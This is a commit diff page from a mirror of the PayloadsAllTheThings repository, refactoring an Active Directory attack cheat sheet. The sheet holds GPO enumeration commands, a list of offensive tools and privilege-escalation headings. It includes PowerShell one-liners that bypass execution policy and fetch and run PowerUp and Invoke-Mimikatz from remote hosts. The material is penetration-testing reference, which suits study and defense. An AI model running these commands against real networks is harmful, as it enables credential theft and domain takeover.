daffainfo
/
PayloadsAllTheThings
mirror of https://github.com/daffainfo/PayloadsAllTheThings.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

AD - Little fixes and refactor

patch-1
Swissky 2018-04-28 19:54:32 +02:00
parent cb3b298451
commit 2dcffadd46
1 changed files with 18 additions and 13 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

31
Methodology and Resources/Active Directory Attack.md
View File

@ -33,6 +33,12 @@
List all GPO for a domain :
Get-GPO -domaine DOMAIN.COM -all
Get-GPOReport -all -reporttype xml --all
or
Powersploit:
Get-NetGPO
Get-NetGPOGroup
```
* Dangerous Built-in Groups Usage
@ -99,22 +105,21 @@
## Tools
* [Impacket](https://github.com/CoreSecurity/impacket)
* Responder
* Mimikatz
* [Responder](https://github.com/SpiderLabs/Responder)
* [Mimikatz](https://github.com/gentilkiwi/mimikatz)
* [Ranger](https://github.com/funkandwagnalls/ranger)
* BloodHound
* RottenPotato
* [BloodHound](https://github.com/BloodHoundAD/BloodHound)
* [AdExplorer](https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer)
## PowerSploit
```
https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon
powershell.exe -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString('http://10.11.0.47/PowerUp.ps1'); Invoke-AllChecks”
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');"
```
* [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec)
* [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon)
```
powershell.exe -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString('http://10.11.0.47/PowerUp.ps1'); Invoke-AllChecks”
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');"
```
## PrivEsc - Token Impersonation (RottenPotato)
## Privilege Escalation
### PrivEsc - Token Impersonation (RottenPotato)
Binary available at : https://github.com/foxglovesec/RottenPotato
Binary available at : https://github.com/breenmachine/RottenPotatoNG
```c
@ -134,7 +139,7 @@ Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -n
```
## PrivEsc - MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64)
### PrivEsc - MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64)
```
Powershell:
https://www.exploit-db.com/exploits/39719/